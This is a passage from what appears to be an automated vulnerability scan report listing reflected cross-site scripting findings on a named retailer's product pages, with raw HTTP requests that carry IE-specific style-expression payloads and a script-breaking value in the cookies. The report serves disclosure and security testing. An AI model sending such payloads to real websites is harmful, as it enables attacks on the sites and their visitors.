GET /Clothing-Shoes/MICHAEL-Michael-Kors-Mens-Wool-Blend-Overcoat/5110032/product.html?4a1c8"style%3d"x%3aexpression(alert(1))"f71bfc3a0e6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.56. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae12"style%3d"x%3aexpression(alert(1))"5a68717ae1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cae12"style="x:expression(alert(1))"5a68717ae1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-3-4-Faux-Fur-Polyfill-Jacket/4870176/product.html?cae12"style%3d"x%3aexpression(alert(1))"5a68717ae1c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.57. http://www.overstock.com/Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d217"style%3d"x%3aexpression(alert(1))"f287cfbe090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d217"style="x:expression(alert(1))"f287cfbe090 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/MICHAEL-Michael-Kors-Womens-Down-Faux-fur-Trimmed-Coat/4863020/product.html?9d217"style%3d"x%3aexpression(alert(1))"f287cfbe090=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.58. http://www.overstock.com/Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bd67"style%3d"x%3aexpression(alert(1))"682ca66b68a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bd67"style="x:expression(alert(1))"682ca66b68a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html?3bd67"style%3d"x%3aexpression(alert(1))"682ca66b68a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.59. http://www.overstock.com/Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d61"style%3d"x%3aexpression(alert(1))"71b1037c527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19d61"style="x:expression(alert(1))"71b1037c527 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html?19d61"style%3d"x%3aexpression(alert(1))"71b1037c527=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.60. http://www.overstock.com/Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e0f"style%3d"x%3aexpression(alert(1))"5456ad3f7ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67e0f"style="x:expression(alert(1))"5456ad3f7ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html?67e0f"style%3d"x%3aexpression(alert(1))"5456ad3f7ca=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.61. http://www.overstock.com/Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eac5"style%3d"x%3aexpression(alert(1))"c658ba364b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5eac5"style="x:expression(alert(1))"c658ba364b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html?5eac5"style%3d"x%3aexpression(alert(1))"c658ba364b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.62. http://www.overstock.com/Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8d6"style%3d"x%3aexpression(alert(1))"108d0b06648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e8d6"style="x:expression(alert(1))"108d0b06648 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html?9e8d6"style%3d"x%3aexpression(alert(1))"108d0b06648=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.63. http://www.overstock.com/Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac5ee"style%3d"x%3aexpression(alert(1))"95ea8f2b043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac5ee"style="x:expression(alert(1))"95ea8f2b043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html?ac5ee"style%3d"x%3aexpression(alert(1))"95ea8f2b043=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.64. http://www.overstock.com/Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b23c2"style%3d"x%3aexpression(alert(1))"428f9b27895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b23c2"style="x:expression(alert(1))"428f9b27895 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html?b23c2"style%3d"x%3aexpression(alert(1))"428f9b27895=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.65. http://www.overstock.com/Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f20"style%3d"x%3aexpression(alert(1))"5a0146d5e47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5f20"style="x:expression(alert(1))"5a0146d5e47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html?e5f20"style%3d"x%3aexpression(alert(1))"5a0146d5e47=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.66. http://www.overstock.com/Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5529"style%3d"x%3aexpression(alert(1))"6cf8dae6ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5529"style="x:expression(alert(1))"6cf8dae6ef3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html?b5529"style%3d"x%3aexpression(alert(1))"6cf8dae6ef3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.67. http://www.overstock.com/Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886f7"style%3d"x%3aexpression(alert(1))"42e768c8803 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 886f7"style="x:expression(alert(1))"42e768c8803 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html?886f7"style%3d"x%3aexpression(alert(1))"42e768c8803=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.68. http://www.overstock.com/Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 421c7"style%3d"x%3aexpression(alert(1))"493fc4af8a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 421c7"style="x:expression(alert(1))"493fc4af8a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html?421c7"style%3d"x%3aexpression(alert(1))"493fc4af8a3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.69. http://www.overstock.com/Clothing-Shoes/Rocket-Dog-Womens-Chestnut-Mid-calf-Boots/4469409/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 179c0"style%3d"x%3aexpression(alert(1))"7a88e7a4193 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 179c0"style="x:expression(alert(1))"7a88e7a4193 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
